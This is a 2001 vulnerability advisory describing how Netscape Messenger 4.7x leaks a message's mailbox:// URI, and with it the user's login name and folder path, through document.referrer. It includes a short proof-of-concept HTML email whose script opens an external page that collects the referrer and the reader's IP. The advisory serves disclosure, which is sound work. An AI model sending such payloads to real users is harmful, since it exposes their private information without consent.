Author                  : 3APA3A <3APA3A@security.nnov.ru>
Affected software       : Netscape 4.7x All Platforms
Vendor                  : Netscape (IPlanet)
Risk                    : Low
Remotely Exploitable    : Yes
Released                : 30 May 2001
Vendor URL              : http://www.netscape.com
SECURITY.NNOV advisories: http://www.security.nnov.ru/advisories



Background:

Netscape  Messanger  uses  internal  protocol  called  mailbox://. The
format of mailbox URI is
 mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber
this  URI  contains full path to user's mailbox which usually contains
user's  login  name  and  in case of Windows 9x - the path to Netscape
installation.

Problem:

It's  possible  to  retrieve mailbox:// URI of the message. E.g., it's
possible to retrieve mailbox location, user's system login and in some
cases path to Netscape installation.

Details:

When  link  invoked  from  message,  Netscape sets "document.referrer"
property  to URI of the message contained this link. Javascript on the
target  page  is  able  to  retrieve  this property and pass it to any
location together with IP of calling machine.

Exploitation:

The simple message below forces Netscape Messanger to open new window.
Target  page  will  display your IP and document.refferer. If you read
this  message  with  Netscape  Messanger  you can simply click http://
reference below.
-=-=-=-=-=-=-=-=-=-
From: 3APA3A
To: 3APA3A
Subject: Test your Netscape
Content-Type: text/html

<html><script>
 window.open('http://www.security.nnov.ru/files/nsdemo.asp');
</script></html>
-=-=-=-=-=-=-=-=-=-

Vendor:

Netscape was contacted May, 30 2001 via
 http://help.netscape.com/forms/bug-security.html
No feedback were given.